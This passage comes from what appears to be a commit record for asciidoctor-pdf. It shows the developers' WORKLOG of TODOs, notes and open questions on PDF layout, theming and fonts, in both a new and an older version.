seem to affect flow)\n* *margin per heading level* (#176)\n* need a single object to hold complete font properties; different from font family\/style object\n* font method should support a single argument that's a font object or font hash\n - in general, the way font properties are set needs to be cleaned up\n* allow font size in theme to be specified in em or %\n - should multiply value being inherited\n* can't put margin top on chapter (chapter_top?) 
(#576)\n* convenience method to check if there's enough room for another line on page\n* allow dynamic background image with page number in path\n* running header\/footer covers content (perhaps just a limitation that needs to be documented)\n* document that palette-based transparent in PNGs is not supported in older version of Prawn\n* FILE ISSUE: for prawn to preserve space (even w\/ guards, spaces don't preserve over wrapped lines)\n - if this is fixed, we can remove all the guard indent code\n* FILE ISSUE: for prawn to support spacer fragments with fixed width \/ height and no text (or text is ignored in calculations)\n - needed for arranging inline objects\n* document limitations in README (such as no linear gradients in SVG, etc)\n* document all permutations of image sizing\n* set vposition on title page logo image explicitly to avoid page overrun?\n* verse has problems with wrapping if line is long (in what way?)\n* allow default kerning to be set using theme\n* keep line comment in front of callout number to aid copying?\n* rework pull request for source line numbers (combine with restore conum logic if conums are enabled)\n - also combine with the preserve_space logic\n* allow front cover and back cover image to be defined in theme as fallback; document in theming-guide\n* should we shorten the keys to front-cover and back-cover (since image is implied?)\n* keep caption with table (check for sufficient space); only for top placement since bottom placement is much harder\n* allow valign to be set on image block (vertical center in page for things like slides)\n* allow title page image \"bottom\" to be set instead of \"top\" (mutually exclusive)\n* rtl (see .\/sandbox\/rtl\/ folder)\n* pass macro doesn't work in source block when macro subs and highlighting are both enabled (#180)\n* enable cache_images option for prawn-svg (#223)\n* bind image_registry between scratch and main document so we don't process the same image more than once\n - need to do some testing\n* show SVG warnings if debug (or trace) is on\n* clean temporary files once per conversion instead of per node? (file issue)\n* title is being rendered 3 times (maybe one for scratch?); explain why in comments if normal\n - block title?\n* continue working on json schema for theme; try to generate keys section from it\n* rethink how we're handling line heights for fonts, then document carefully\n - look closer at line_height and line_height_length and see if we need to document other details\n - allow line height to be set in more places (such as the prose for admonition, example, sidebar, etc)\n* implement first-line indent for paragraphs (seems like conflict w\/ our text formatter)\n - option to not indent first paragraph in section\n - add indent\/noindent options\n - if you indent, perhaps drop the margin between paragraphs?\n* add entry to TOC for preamble\/preface\n* can we create fragments directly in converter instead of using the formatted text parser?\n - would need to override how blocks join content; perhaps even how apply_subs works\n* don't issue warnings on scratch document\n - perhaps introduce a helper method to abstract this away\n* getting a line wrap break before comma if preceding word is emphasized (problem in Prawn wrapping)\n - no longer a problem? 
perhaps was due to #462; could also be when it does wrap by char\n* toc\n - make dot leader style separate from title \/ number\n* running content\n - side margins (allow override, default to content margins)\n - numbered and unnumbered chapter and section titles (file issue)\n - chapter and section number (easily solved by previous)\n - separate running content for chapter page (by default uses normal content)\n* should we rename base_ to body_ to make it more familiar to CSS developers?\n* support !include in theme file (#571)\n* add cover page example to chronicles so people see how to use it\n - need to find a good cover page\n* don't orphan a single line of paragraph (send it with a buddy line)\n - implement orphan sentences for paragraph\n* implement stem support\n - see asciidoctor-mathematical and asciidoctor-mathoid\n* fail gracefully if theme file cannot be found\n - report it can't be found (should we fallback to default theme?)\n* expose theme variable on document (using attr_reader?)\n* dedicated style for top\/bottom margin of outline list\n - allow margin top and bottom to be set for lists (applies to outer-most list)\n - allow spacing between nested lists levels be configured in theme\n* need dedicated theme styles for paragraph spacings, etc\n* subtitles for parts and chapters (#623)\n* part titles need their own styling\n* add color calculation functions in theme file (like in SASS)\n* create utility method to get % offset of page as y value (option to constrain to bounds)\n* document why we have converter assignment in convert_content_for_block method\n - do we still need the converter hack in convert_content_for_block? (seems to be needed for admonitions)\n* support transparency for colors (this is now supported by resolve_theme_color)\n - utility to coerce the color value transparent to nil (better handling in general)\n* support generic color (or value) attribute in formatted text parser instead of specific color systems (rgb, cmyk)\n* **allow theme_font to set line_height** (honor this setting from document)\n - theme setting for code line height (currently using base_line_height)\n* should we put an entry for doctitle in the outline if notitle is set? (need to test these edge cases)\n* add more theme control over toc (per-level font size, style, color, etc)\n* strip formatted text (e.g., monospace) from headings and toc entries\n* prevent title-logo-image from spilling to next page (same with title content)\n* document what each keep_together is doing \/ expects\n - keep_together really needs to pick up the inherited horizontal bounds or else measurement is inaccurate; fixed?\n* code cleanups (regexps to constants, nil? checks and such)\n - split prawn_ext\/extensions into individual files based on function\n* enable line above (or below?) 
title on title page (file issue)\n - perhaps 4-sided border?\n* enable text transform for:\n - running content\n - admonition content\n - table foot row\n - table header cell\n - table (overall)\n - generic paragraph?\n - inline literal text\n - inline link\n - inline literal\/monospaced\n - listing\/literal\/source block\n - global default\n* file upstream issue for Prawn to warn if it can't resolve a glpyh (or monkeypatch it)\n* support web fonts; use uri-cache to avoid redundant fetching\n* align caption to match alignment of block image\n* FILE ISSUE: attribute or role to control table shading (all, even, odd) (or call it striped like bootstrap?)\n - e.g., [.striped]\n - currently controlled by theme\n* make conum glyphs configurable in theme (use reference table to resolve)\n* CJK and\/or multilingual support (see https:\/\/github.com\/chloerei\/asciidoctor-pdf-cjk)\n* description list term should keep together with content (file issue)\n* allow font properties to be set for lists (description_list, outline_list)\n* hardbreak in table cell results in extra endline (likely not normalizing cell content)\n* remove pdfmarks file after optimizing\n* look into single_line + shrink_to_fit in listings, perhaps other places\n* refactor as Prawn view to avoid method name conflicts (also see https:\/\/github.com\/prawnpdf\/prawn\/issues\/802)\n* create proper default (Asciidoctor) theme (#60)\n* document how the treetop parser is rebuilt\n* rework font so we can set actual height, calculate x_height internally (use 1em for spacings)\n* padding top and bottom on content affects height_of calculations (need to review)\n* code font needs to support more than just ascii (Golo license block is an example)\n* don't cutoff content in partintro\n* admonition styles are one big hack; need to be organized and based on theme\n* BUG: autofit logic not working with Courier (still overrunning line)\n* honor safe mode rules\n* print scratch.pdf file if verbose \/ trace mode is on in Asciidoctor\n* introduce setting to indent section content\n* rename default theme to docbook theme, make default the Asciidoctor theme (should we have a base theme?)\n* allow relative font size for inline code to be set (perhaps a percentage or em value? there are problems with this in arranger)\n* apply line height metrics for table content\n - figure out how to adjust line height for monospaced cell content\n - figure out how to layout regular cell content to adjust for line height\n* document the typeset_text methods very clearly\n* move check for node.title? inside layout_caption\n* theme idea \/ tester: see sandbox\/ebook-learn_version_control_with_git-SAMPLE.pdf\n* make alternating page title position optional (via theme?)\n* fix passthrough placeholders that get caught up in syntax highlighting (see https:\/\/github.com\/asciidoctor\/asciidoctor\/blob\/master\/test\/blocks_test.rb#L2258-L2277)\n* FILE ISSUE list Preamble in TOC\n - perhaps only if it has a title? or should we use a default title if one isn't specified?\n* honor font defs in SVG (to get M+ 1p); prawn-svg supports loading fonts; need to pass fonts to prawn-svg\n* should we support % as a unit in theme (divides by 100 and sets float value)?\n* disable monospace font color (and family?) 
in headings\n* add source language to upper-left corner of listing block\n* implement quote style from default Asciidoctor stylesheet\n* reorganize Prawn extensions (see prawn-table for example)\n* rename \"theme\" to \"style\"?\n* restrict custom theme path to jail (or load from load_path)\n* enforce jail on SVG option enable_file_requests_with_root\n* implement convert_toc\n* italic text in a line of text styled as bold in the theme loses its bold style\n* introduce method for start_initial_page?\n* make outline a document option (perhaps \"outline\" like \"toc\")\n* add bench\/ directory for the script to test the speed of the formatted text parser\n* start page numbering on page 1 (use \/PageLabels reference to make i the title page number)\n - add this feature upstream to Prawn\n* *report image only page w\/ stamps corruption issue to Prawn*\n - still true?\n* add \/PageMode \/UseOutlines\n* cli arguments\n - theme (pdf-style, pdf-stylesdir)\n - enable\/disable writing pdfmark file\n - optimize-pdf\n* implement footnotes correctly (#73, #85)\n* flesh out outline more (in what way?)\n* flesh out title page more\n - document subtitle (partially solved)\n* don't create title page for article doctype (#95, #105)\n - only create title page if doctype=book\n* allow character spacing to be controlled by theme\n* might be able to avoid dry run for listing\/literal in obvious cases; engineering estimate\n* allow pdf-page-margin to be set in document\n - this is slighly more complicated now that we have mirror margins; perhaps can't set those from document?\n* use `module Asciidoctor; module PDF; module FormattedText` convention to simplify indentation\n* introduce code style guide (like in Jekyll AsciiDoc); perhaps make this a shared file in the Asciidoctor ecosystem?\n* I'd like for theme to be able to set font scan path for Prawn SVG, but registry is global\n* rename dot_leader to just leader or tab_leader?\n* rename align to text_align?\n* QUESTION should bullets be on right if list alignment is right (what about center?)\n* QUESTION should we resolve font-based icons globally, in init_pdf?\n\n* use treetop to parse and evaluate theme file\n* use or don't use pad method? 
check performance\n* switch wolpertinger to howling grasshopper mouse\n\n== Major Efforts \/ Milestones\n\n* add a test suite\n* refactor as Prawn View\n* add support for AsciiDoc table cell content by writing custom Table::Cell implementation\n* add support for nested tables by writing custom Table::Cell implementation\n* add support for footnotes (as article or chapter endnotes)\n* rework text handling in Prawn to support line height natively\n* margin collapsing (like CSS)\n\n== Documentation\n\n* \"Incorrect number of arguments in 'SCN' command\" happens when you add a stamp to an imported page\n* be mindful that layout_prose adds margin to bottom of content by default (important when working in a bounding box)\n* ttfunk does not support ligatures (e.g., fi -> \ufb01); we could do this manually in post_replacements\n\n== Notes\n\n* when using `single_line: true` on formatted_text, it's necessary to reapply our padding top\/bottom from line metrics\n* we always leave cursor on start of page we're about to write on; certain checks rely on this fact\n* \"section title\" is the semantic element; \"heading\" is the structural element\n* \/PageLabels\/Nums must have entry for every page in front matter, even if a blank page\n - in fact, must account for every page or else numbering lags behind when scrolling document\n* if we set the vposition on image to a numeric value, it skips the overrun check that happens internally\n* any instance variables referenced by converter methods for inline nodes could get accessed before the converter for document is called\n* Evince throws warning when printing PDF if & is used in document title; but this is valid according to the PDF specification\n* Prawn drops fragments with empty text (hence the need to use zero-width space)\n - analyze_glyphs_for_fallback_font_support drops fragments with empty text\n - later on, initialize_wrap drops fragment with empty text\n* use term \"page number label\" to refer to the visible, printed page number (not the implicit page number)\n* vertical alignment of text doesn't work properly in Prawn; better to calculate alignment manually, if possible\n\n== Known Issues\n\n* inline image at start of the line is slighly shifted to the right due to the fact that it's placed in the center of the reserved fragment width; perhaps we are adding this padding\n\n== Potential Optimizations\n\n* if autofit is set on a listing\/literal block that has conums, we are splitting fragments by line twice\n* comparing > 0 is slightly faster than == 0 (for cases when we can swap the logic)\n\n== Usage Optimizations\n\n* uncompress PNG files to avoid slow zlib inflating step in Prawn\n* flatten PNGs (remove alpha channel) since it messes up font rendering on the page in Adobe Acrobat Reader (need to verify)\n* avoid the fallback font if possible (use full fonts in your theme) because it checks for *every* glyph\n* font families used in SVGs must match keys in the font catalog\n\n== Open Questions\n\n== Implementation\n\n* should we read SVG file using UTF-8 encoding; or does REXML handle encoding?\n* can we leverage before_rendering_page callback on table?\n* should we use move_past_bottom in some places instead of start_new_page?\n\n=== Design\n\n* remove\/reduce padding above heading when it appears at the start of a page?\n* Default line height?\n* Should the heading sizes be calculated according to the default font size?\n* Page margins\n* Body indentation?\n - recto \/ verso indentation?\n* Size of masthead \/ footer\n* Line separating 
masthead \/ footer?\n* Separate title page\n* Start chapter on new page?\n* Special layout for chapter page?\n\n=== Theme\n\n* keep or drop base_ prefix in theme? I think we should keep it because it provides context elsewhere in the document (e.g. $base_font_size vs $font_size)\n\n== Resources\n\n* https:\/\/code.google.com\/p\/origami-pdf\/[Origami PDF: A PDF inspection library]\n* https:\/\/github.com\/a1ee9b\/PrintPretty[A theme for PDF designed for printing]\n* http:\/\/randomtextgenerator.com[Random Text Generator, supports multiple languages]\n* http:\/\/clagnut.com\/blog\/2380[List of pangrams]\n - http:\/\/www.camcc.org\/_media\/reading-group\/qianziwen-en.pdf[1,000 character classic (Chinese)]\n* pdf2svg can convert the PDF file into an SVG (one SVG per page)\n* https:\/\/blog.codeship.com\/build-math-evaluation-engine[How to Build a Simple Math Evaluation Engine]\n* http:\/\/blog.typekit.com\/2011\/11\/03\/optimizing-fonts-for-the-web-unicode-values-glyph-set-underlines-and-strike-through\/[Optimizing Fonts for the Web]\n","old_contents":"= WORKLOG\n\n* use Groovy language specification as case study to find corner cases\n - perhaps progit2 as well; others?\n\n== TODO\n\n* remove support for link_color option in layout_prose as this is now handled by text formatter\n* BUG: implicit width of inline image (SVG only?) calculated incorrectly (see sandbox\/issue-494)\n* FILE ISSUE: SIMPLE: use docdate attribute instead of Time.now to set modification date on document\n* SIMPLE: fill in missing defaults in theming guide\n - title_page\n - toc\n - table_header_cell\n - admonition_icon_<name>_stroke_color\n - description_list_term_font_style\n - header\/footer\n* SIMPLE: mark required keys (assume keys are optional by default)\n - required keys can never have a null value; most are set by base theme\n* add URL to chronicles example that contains a character reference, such as pass:[&]\n* allow links to be underlined (theme setting) (#567)\n* SIMPLE: document vw\/vh measurement units in theming guide (make it clear it only applies in certain cases)\n* SIMPLE: in theming guide, emphasize not using the fallback font when working with very large documents\n - explain that default theme uses a fallback font\n* FIXME: stop using fallback fonts in default theme (instead, bundle a fuller font)\n - using fallback fonts significantly slows down Prawn because it checks every letter every time (see https:\/\/github.com\/prawnpdf\/prawn\/blob\/master\/lib\/prawn\/text\/formatted\/box.rb#L427-L434)\n* add broader character range to monospace font so we can drop fallback font by default (#282)\n - consider having a fallback for prose and fallback for literal\n* SIMPLE: recommend use of prawn-gmagick in README\n - https:\/\/github.com\/packetmonkey\/prawn-gmagick\n - must install GraphicsMagick-devel on Fedora\n* use ImageMagick (or GraphicsMagick) to uncompress PNG images before reading them (could also just document this)\n - mention where we talk about prawn-gmagick in README\n* use <a id=\"\"><\/a> instead of <a name=\"\"><\/a> for anchor point in formatted text\n - benchmark to see if it's faster to use empty or non-empty element in parser\n* QUESTION: should we set pdf-anchor attribute on every node that has an id?\n - isn't it required for cross references to work?\n* new design for keep together; necessary to get exact height accounting for gaps at page breaks\n . in dry run, set to stop when advancing to next page (override on_page_create to throw exception)\n . 
if less than one page, return calculation (similar to what we do now)\n . if greater than one page, clear on_page_create; move to y offset of original and start dry run again; fix calculation\n . (if not keeping together, we can skip 1 and 2)\n* rename \"convert_content_for_\" since it can collide with existing blocks\n* rework resolve_image_path API so it's more logical; override based on type of first argument; document as option\n* don't orphan block title (make sure anchor stays with start of block)\n* QUESTION should we report full image path of gif in warning message when prawn-gmagick is not available?\n* QUESTION should we add destination to top of imported PDF page?\n - import page should accept id as section, optional argument\n* leading (line height) isn't applied when content is split across pages\n* generate fonts without PS Glyph Names to reduce file size\n - create script that can generate fonts entirely from original font source\n* if start_new_page is called at end of layout_chapter_title, and media=prepress, ghostscript reports an error\n - problem is no color space is set; can fix by calling update_colors before advancing to recto page in start_new_chapter\n - maybe introduce a skip_page helper to combine these operations?\n - upstream issues: https:\/\/github.com\/prawnpdf\/prawn\/issues\/951 and https:\/\/github.com\/prawnpdf\/prawn\/issues\/473\n* FILE ISSUE: cells in table head are wrapping by char, but don't set width of column\n - most prominent in auto-width tables\n* document how to test \/ use a PR\n - see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/462#issuecomment-246200953\n* break printed URIs at each forward slash (and perhaps at ? and & too) (#563)\n* add empty? method to Page (instead of page_empty? 
on document)\n* SIMPLE: add warning that AsciiDoc table cell content is not supported; print as raw source\n* FILE ISSUE: add option to svg method to not move cursor (in prawn-svg)\n* FILE ISSUE: prevent import_page from adding an extra page; leaves blank page when placing two inserts in a row\n - have import_page first delete current page if page is empty\n* FILE ISSUE: in prawn: go_to_page should accept second argument that is cursor position\n* UNRESOLVED: dry_run should start at cursor of main document (or as option); total height calculation would need to be revised\n - box_height isn't currently accurate when it spans more than one page\n - this should fix height calculation when content is split over a page break (leaving small amount of excess)\n - however, if cursor is advanced to fit content on page, then that excess will cause box_height to be too large\n - life would be simpler if Prawn allowed us to draw graphics at bottom layer\n* allow height of inline image to be set to line height (perhaps 1em?)\n* support pdfwidth for inline image\n* space around inline anchors\/index entries doesn't get collapsed by text formatter\n* add support for format attribute on image macro to image-related attributes such as title-page-background-image\n - support explicit image format for cover page image and page background image\n* introduce abstract-title attribute to complement preface-title?\n* need some sort of post_construct method for converter that receives document\n - inline convert methods can get called before init_pdf\n - monkeypatch?\n* backport resize method from prawn-svg and use it in converter\n* create document that explains how built-in fonts are generated and what subsets are selected\n - I need instructions for myself so I know how to update\/modify the fonts\n - document in theming guide what must be done to prepare fonts (old-style 'kern' table, optionally subset) (file issue!)\n* consider supporting icon tag in parser to simplify how inline icons are stored; simpler use of passthrough content\n* cache stateless cell data resolved from theme (don't need to recalc each time; at least per table)\n* autowidth on table doesn't work for multi-line content (prawn-table bases width calculation on normalized value)\n - table ends up being stretched even though it doesn't need to be\n* table logic: does the layout_table_caption have to be inside the table block? can we pre-calculate the actual width for the caption? 
does the table offer a callback we can use to keep the caption on the same page as the table?\n* introduce object to store\/organize running content data and specs\n* QUESTION: should theme font handle hierarchical keys (either explicitly or implicitly)\n* need to support .canvas role on image so it isn't shrunk to fit inside top\/bottom margins\n - perhaps .canvas, .canvas-x, .canvas-y\n* FILE ISSUE: when split source listing, add top padding to bounding box (or is it the line metrics top?)\n - perhaps this has to do with the a miscalculation in dry run when not starting from same y position?\n* should we print alt text if an error is caught when attempting to embed an image?\n* stroke and fill multi-page sidebar block (#259) and example block (#362)\n* support URL images in running content (need to delegate to resolve_image_path)\n* rewrite optimize-pdf using rghost (#535) (also see #21 and #22)\n - add Optimizer class; wire to cli (separate issue?)\n* add feature to number bullets according to section number (needed for OpenDevise agreements)\n* outline should link to title page if there's a cover page (skip cover page and ensuing blank page)\n* might be better to organize fragments of source chunks by lines (and pass that around) to simplify post-processing\n* support negative start value for list (#498)\n - need to count negative numbers in correct direction\n* margins\/paddings at page boundaries are strange, fragile\n* implement margin collapsing (between blocks)\n - would eliminate need for negative padding for blockquote\n* SIMPLE: submit pastie theme for Rouge upstream\n* bw theme for CodeRay (or Rouge) to match output of Pygments bw\n* the nested? method on list isn't checking if nested inside a block inside a list\n* wrapped lines in source listing should be indented to account for line number gutter (#504)\n* add sample SVG to content of chronicles-example.adoc (we do already use one for title page)\n* inline images: allow built-in font family names for SVG to be remapped\n* inline images: should we be passing absolute image path in tag or something relative (or even a lookup id?)?\n* support zero-leading integers (use dedicated type like w\/ roman numerals) in reversed order lists\n* large image runs into running footer (doesn't bottom margin need to be aligned with running footer height?)\n* should str_to_pt helper handle % and vw units?\n* allow style of visible link to be controlled by theme (similar to what we do in the manpage converter)\n* FILE ISSUE: should not wrap at formatting mark unless it is at a break opportunity\n - the problem here is that Prawn is allowing breaks at the boundaries of text fragments; it should only look at the contents\n* be more consistent with how examples are shown in theming-guide.adoc (do we show last segment only?)\n* allow top as alternative to margin_top for all elements on title page (#431)\n* swallowing exceptions! 
(any use of e.message in a string is dangerous)\n* allow ordered list marker to be prefixed by section number (a global setting?)\n* conum not aligned vertically with callout text (perhaps too small?)\n* conum should never wrap (push it into the text if necessary)\n* decouple theme settings for section titles and discrete headings\n* decouple listing\/literal\/source theme settings; currently all under code\n* replace explicit char ranges with classes in regexp (e.g., [[:word:]] or \\w)\n* devise a way to specify a value as a string literal (variable replacement only) in theme\n* apply calculated theme values after loading?\n* allow \"content\" in place of recto_content & verso_content for running header\/footer\n - still relevant after restructuring?\n* be more specific in theming guide as to where prose_margin_top and prose_margin_bottom apply\n* allow image to span width of page (role=canvas, role=canvas-x or role=canvas-y); if role is canvas or canvas-y, then it does not consume height\n - partially addressed by vw units\n* allow valign value to be a number (requires change to Prawn)\n* layout SVG without using keep_together (since we know all the dimensions)\n - fix SVG to a single page (check height + caption height)\n* allow background color to be set for chapter \/ heading\n* allow border to be set around block image\n* switch wolpertinger to howling grasshopper mouse\n* file issue in prawn to dispatch to image handler for images it doesn't know about\n* add brief mention in theming guide that deeper customizations can be achieved by extending the converter\n - reference infoq-minibook repo & blog post\n - document how to extend the converter, use Prawn\n* allow alignment of list to be set separately from base align (and perhaps a hint in document)\n* is https:\/\/github.com\/packetmonkey\/prawn-pdfimage a safer way than prawn-templates to import PDF as image?\n* rename ThemeLoader to ThemeReader (or ThemeManager)?\n* SIMPLE: document autofit option on verbatim blocks (in README?)\n* normalize step leaves space after endline (i.e., `\\n `) at a hard line break (doesn't seem to affect flow)\n\n* *margin per heading level* (#176)\n* can't put margin top on chapter (chapter_top?) 
(#576)\n* document how to override the Ruby code to get custom styling in the theming guide\n* convenience method to check if there's enough room for another line on page\n* allow font size in theme to be specified in em or %\n* allow dynamic background image with page number in path\n* running header\/footer covers content (perhaps just a limitation that needs to be documented)\n* document that palette-based transparent in PNGs is not supported\n* file issue for prawn to preserve space (even w\/ guards, spaces don't preserve over wrapped lines)\n - if this is fixed, we can remove all the guard indent code\n* file issue for prawn to support spacer fragments with fixed width \/ height and no text (or text is ignored in calculations)\n* file issue that prawn-svg messes with the cursor (need to explain how)\n* document limitations in README (such as no linear gradients in SVG, embedded images in SVG must be URL or inlined, PNGs must be flattened, etc)\n* document all permutations of image sizing\n* set vposition on title page logo image explicitly to avoid page overrun?\n\n* allow pdf-page-margin to be set in document\n - this is slighly more complicated now that we have mirror margins; perhaps can't set those from document?\n* verse has problems with wrapping if line is long (in what way?)\n* allow default kerning to be set using theme\n* keep line comment in front of callout number to aid copying?\n* rework pull request for source line numbers (combine with restore conum logic if conums are enabled)\n - also combine with the preserve_space logic\n* allow front cover and back cover image to be defined in theme as fallback; document in theming-guide\n* should we shorten the keys to front-cover and back-cover (since image is implied?)\n* keep caption with table (check for sufficient space); only for top placement since bottom placement is much harder\n* allow valign to be set on image block (vertical center in page for things like slides)\n* separate theme control for listing vs literal block (and maybe source too)\n* allow title page image \"bottom\" to be set instead of \"top\" (mutually exclusive)\n* rtl (see .\/sandbox\/rtl\/ folder)\n\n* pass macro doesn't work in source block when macro subs and highlighting are both enabled (#180)\n* enable cache_images option for prawn-svg (#223)\n* bind image_registry between scratch and main document so we don't process the same image more than once\n - need to do some testing\n* show SVG warnings if debug (or trace) is on\n* clean temporary files once per conversion? (file issue)\n* clear font paths in SVG interface so it doesn't scan system? 
(since it's not portable anyway)\n* title is being rendered 3 times (maybe one for scratch?); explain why in comments if normal\n* finish docs\/theming-guide.adoc\n - continue working on json schema for theme; try to generate keys section from it\n* rethink how we're handling line heights for fonts, then document carefully\n - look closer at line_height and line_height_length and see if we need to document other details\n* implement first-line indent for paragraphs (seems like conflict w\/ our text formatter)\n - option to not indent first paragraph in section\n - if you indent, perhaps drop the margin between paragraphs?\n* add index support\n* add entry to TOC for preamble\/preface\n* can we create fragments in converter instead of using the formatted text parser?\n* allow text alignment of prose to be set in document\n* don't issue warnings on scratch document\n* rake release seems messed up (tagging the wrong commit)\n* getting a line wrap break before comma if preceding word is emphasized (problem in Prawn wrapping)\n* toc\n - make dot leader style separate from title \/ number\n* running content\n - side margins (allow override, default to content margins)\n - numbered and unnumbered chapter and section titles (file issue)\n - chapter and section number (easily solved by previous)\n - separate running content for chapter page (by default uses normal content)\n* should we rename base_ to body_ to make it more familiar to CSS developers?\n* support !include in theme file (#571)\n* add cover page example to chronicles so people see how to use it\n* don't orphan a single line of paragraph (send it with a buddy line)\n - implement orphan sentences for paragraph\n* implement stem support\n - see asciidoctor-mathematical and asciidoctor-mathoid\n* fail gracefully if theme file cannot be found\n* expose theme variable on document (attr_reader?)\n* dedicated style for top\/bottom margin of outline list\n - allow margin top and bottom to be set for lists (applies to outer-most list)\n - allow spacing between nested lists levels be configured in theme\n* need dedicated theme styles for paragraph spacings, etc\n* recto\/verso indentation (on body?)\n* don't indent and draw line next to quote block unless width > 0 or color != transparent\n* subtitles for chapters\n* part titles need their own page and styling\n* add color calculation functions in theme file (like in SASS)\n* create utility method to get % offset of page as y value (option to constrain to bounds)\n* document converter assignment in convert_content_for_block method\n* support transparency for colors (this is now supported by resolve_theme_color)\n* support generic color (or value) attribute in formatted text parser instead of specific color systems (rgb, cmyk)\n* **allow theme_font to set line_height** (honor this setting from document)\n - theme setting for code line height (currently using base_line_height)\n* should we put an entry for doctitle in the outline if notitle is set? (need to test these edge cases)\n* add more theme control over toc (font size, style, color per level)\n* don't allow formatted text (e.g., monospace) in headings or toc entries\n* prevent title-logo-image from spilling to next page (same with title content)\n* document what each keep_together is doing \/ expects\n - keep_together really needs to pick up the inherited horizontal bounds or else measurement is inaccurate\n* code cleanups (regexps to constants, nil? 
checks and such)\n - split prawn_ext\/extensions into individual files based on function\n* enable line above (or below?) title on title page (file issue)\n - perhaps 4-sided border?\n* enable text transform for:\n - running content\n - admonition content\n - table foot row\n - table header cell\n - table (overall)\n - generic paragraph?\n - inline literal text\n - link\n - listing\/literal\/source block\n - global default\n* file upstream issue for Prawn to warn if it can't resolve a glpyh (or monkeypatch it)\n* support web fonts; use uri-cache to avoid redundant fetching\n* align caption to match alignment of block image\n* FILE ISSUE: attribute or role to control table shading (all, even, odd) (or call it striped like bootstrap?)\n - e.g., [.striped]\n - currently controlled by theme\n* make conum glyphs configurable in theme (use reference table to resolve)\n* do we still need the converter hack in convert_content_for_block? (seems to be needed for admonitions)\n* utility to coerce the color value transparent to nil (better handling in general)\n* CJK and\/or multilingual support (see https:\/\/github.com\/chloerei\/asciidoctor-pdf-cjk)\n* description list term should keep together with content (file issue)\n* allow font properties to be set for lists (description_list, outline_list)\n* hardbreak in table cell results in extra endline (likely not normalizing cell content)\n* remove pdfmarks file after optimizing\n* add note to README that Prawn will subset any fonts provided\n* look into single_line + shrink_to_fit in listings, perhaps other places\n* refactor as Prawn view to avoid method name conflicts (also see https:\/\/github.com\/prawnpdf\/prawn\/issues\/802)\n* create proper default (Asciidoctor) theme\n* document how the treetop parser is rebuilt\n* rework font so we can set actual height, calculate x_height internally (use 1em for spacings)\n* padding top and bottom on content affects height_of calculations (need to review)\n* code font needs to support more than just ascii (Golo license block is an example)\n* don't cutoff content in partintro\n* admonition styles are one big hack; need to be organized and based on theme\n* FILE ISSUE: can't change font properties of admonition block content\n* SIMPLE: add admonition_label_font_color to theme\n* BUG: autofit logic not working with Courier (still overrunning line)\n* honor safe mode rules\n* print scratch.pdf file if verbose \/ trace mode is on in Asciidoctor\n* introduce setting to indent section content\n* rename default theme to docbook theme, make default the Asciidoctor theme (should we have a base theme?)\n* allow relative font size for inline code to be set (perhaps a percentage or em value? there are problems with this in arranger)\n* apply line height metrics for table content\n - figure out how to adjust line height for monospaced cell content\n - figure out how to layout regular cell content to adjust for line height\n* document the typeset_text methods very clearly\n* move check for node.title? inside layout_caption\n* theme idea \/ tester: see sandbox\/ebook-learn_version_control_with_git-SAMPLE.pdf\n* make alternating page title position optional (via theme?)\n* fix passthrough placeholders that get caught up in syntax highlighting (see https:\/\/github.com\/asciidoctor\/asciidoctor\/blob\/master\/test\/blocks_test.rb#L2258-L2277)\n* FILE ISSUE list Preamble in TOC\n - perhaps only if it has a title? 
or should we use a default title if one isn't specified?\n* honor font defs in SVG (to get M+ 1p); prawn-svg supports loading fonts; need to pass fonts to prawn-svg\n* should we support % as a unit in theme (divides by 100 and sets float value)?\n* disable monospace font color (and family?) in headings\n* add source language to upper-left corner of listing block\n\n* implement quote style from default Asciidoctor stylesheet\n* reorganize Prawn extensions (see prawn-table for example)\n* rename \"theme\" to \"style\"?\n* restrict custom theme path to jail (or load from load_path)\n* implement convert_toc\n* italic text in a line of text styled as bold in the theme loses its bold style\n\n* introduce method for start_initial_page?\n* make outline a document option (perhaps \"outline\" like \"toc\")\n* add bench\/ directory for the script to test the speed of the formatted text parser\n* start page numbering on page 1 (use \/PageLabels reference to make i the title page number)\n - add this feature upstream to Prawn\n* *report image only page w\/ stamps corruption issue to Prawn*\n - still true?\n* add \/PageMode \/UseOutlines\n* cli arguments\n - theme (pdf-style, pdf-stylesdir)\n - enable\/disable writing pdfmarks file\n - optimize-pdf\n* implement footnotes correctly (#73, #85)\n* flesh out outline more (in what way?)\n* flesh out title page more\n - document subtitle (partially solved)\n* don't create title page for article doctype (#95, #105)\n - only create title page if doctype=book\n* allow character spacing to be controlled by theme\n* might be able to avoid dry run for listing\/literal in obvious cases; engineering estimate\n* implement index of index terms (#386)\n\n* use treetop to parse and evaluate theme file\n* use or don't use pad method? 
check performance\n\n== Major Efforts \/ Milestones\n\n* add a test suite\n* refactor as Prawn View\n* add support for AsciiDoc table cell content by writing custom Table::Cell implementation\n* add support for nested tables by writing custom Table::Cell implementation\n* add support for footnotes (as article or chapter endnotes)\n* rework text handling in Prawn to support line height natively\n\n== Documentation\n\n* \"Incorrect number of arguments in 'SCN' command\" happens when you add a stamp to an imported page\n* be mindful that layout_prose adds margin to bottom of content by default (important when working in a bounding box)\n* ttfunk does not support ligatures (e.g., fi -> \ufb01); we could do this manually in post_replacements\n\n== Notes\n\n* when using `single_line: true` on formatted_text, it's necessary to reapply our padding top\/bottom from line metrics\n* we always leave cursor on start of page we're about to write on; certain checks rely on this fact\n* \"section title\" is the semantic element; \"heading\" is the structural element\n* \/PageLabels\/Nums must have entry for every page in front matter, even if a blank page\n - in fact, must account for every page or else numbering lags behind when scrolling document\n* if we set the vposition on image to a numeric value, it skips the overrun check that happens internally\n* any instance variables referenced by converter methods for inline nodes could get accessed before the converter for document is called\n* Evince throws warning when printing PDF if & is used in document title; but this is valid according to the PDF specification\n* Prawn drops fragments with empty text (hence the need to use zero-width space)\n - analyze_glyphs_for_fallback_font_support drops fragments with empty text\n - later on, initialize_wrap drops fragment with empty text\n* use term \"page number label\" to refer to the visible, printed page number (not the implicit page number)\n\n== Known Issues\n\n* inline image at start of the line is slighly shifted to the right due to the fact that it's placed in the center of the reserved fragment width; perhaps we are adding this padding\n\n== Potential Optimizations\n\n* if autofit is set on a listing\/literal block that has conums, we are splitting fragments by line twice\n* comparing > 0 is slightly faster than == 0 (for cases when we can swap the logic)\n\n== Usage Optimizations\n\n* uncompress PNG files to avoid slow zlib inflating step in Prawn\n* flatten PNGs (remove alpha channel) since it messes up font rendering on the page in Adobe Acrobat Reader (need to verify)\n* avoid the fallback font if possible (use full fonts in your theme) because it checks for *every* glyph\n* font families used in SVGs must match keys in the font 